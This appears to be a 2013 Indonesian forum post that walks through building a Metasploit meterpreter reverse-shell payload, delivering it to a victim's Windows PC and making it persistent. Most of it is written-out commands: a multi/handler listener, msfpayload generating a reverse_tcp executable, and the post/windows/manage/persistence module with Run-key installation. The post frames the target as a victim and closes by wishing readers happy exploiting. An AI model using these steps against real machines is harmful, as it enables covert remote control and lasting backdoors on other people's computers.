05-15-2013, 10:09 AM
langsung saja ya..
buka metasploit kalian disini saya menggunkan backtrack 5 r3
buka terminal ketikkan msfconsole untuk membuka metasploit
![[Image: Selection_001.png]](https://1.bp.blogspot.com/-IWbi2ALV6Zg/UZLiWUhFCtI/AAAAAAAABMk/9YanpAIFLKg/s1600/Selection_001.png)
lalu masukkan exploit sebagai berikut
use exploit/multi/handler
set lport 4444
set lhost 192.168.1.73 ( isi dengan ip kalian )
exploit
![[Image: Selection_005.png]](https://4.bp.blogspot.com/-2Z7a6ZYWQNg/UZLlEbTvKOI/AAAAAAAABNA/88tnuccMJlU/s640/Selection_005.png)
setelah itu kita bikin listener dengan meterpreter
buka terminal baru ketikkan perintah
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.73 x > Desktop/4444.exe
disini nama payload saya adalah 4444.exe
![[Image: Selection_002.png]](https://3.bp.blogspot.com/-swtp33Dzh_U/UZLjwro2h2I/AAAAAAAABMw/N1GAQb15BHQ/s1600/Selection_002.png)
setelah itu kirim payload tersebut ke pc korban atau dengan teknik lain
setelah korban mengeksekusi file payload tersebut
maka session meterpreter akan terbuka
![[Image: Selection_006.png]](https://1.bp.blogspot.com/-y2WvLwAHQMQ/UZLlRvII6zI/AAAAAAAABNI/xkfDMzZUYDs/s1600/Selection_006.png)
setelah itu ketikkan perintah background pada meterpreter untuk memulai aksi mempermnentkan meterpreter
dan kita akan mencari exploit permanentnya dengan mengetik perintah
search persistence
![[Image: Selection_007.png]](https://3.bp.blogspot.com/-2sxnpMs81UE/UZLmWeJMfbI/AAAAAAAABNU/Xp2whajol0c/s1600/Selection_007.png)
dan lanjutkan untuk perintah selanjutnya
use post/windows/manage/persistence
set lhost 192.168.1.73
set lport 4444
set rexe /root/Desktop/4444.exe
set rexename xbuster404.exe
set session 1
exploit
dan sukses meterpreter sudah tertanam pada pc korban
![[Image: Selection_008.png]](https://3.bp.blogspot.com/-iEy1iJQ4Kf4/UZLqKEkaQ7I/AAAAAAAABNk/o-dWkil1wdk/s1600/Selection_008.png)
sekarang kita coba test untuk membuktkanya
dengan me-reboot pc korban
![[Image: Selection_009.png]](https://2.bp.blogspot.com/-sA5loxcQWs4/UZLq6ftWRUI/AAAAAAAABNw/cr0Y3pEQSwo/s1600/Selection_009.png)
dan pc korban kembali hidup
maka meterpreter session akan terbuka lagi

![[Image: Selection_011.png]](https://2.bp.blogspot.com/-omhTNoIzQBQ/UZLrv9I_SGI/AAAAAAAABN8/QpqUTZx7dtU/s1600/Selection_011.png)
![[Image: Selection_012.png]](https://3.bp.blogspot.com/-I9yqb5-3DdU/UZLr4mA2dkI/AAAAAAAABOE/zLfBqjjgbnw/s1600/Selection_012.png)
payload tersebut berada pada regedit HKCU > Software > Microsoft > Windows > CurrentVersion > RUN
selamat berexploitasi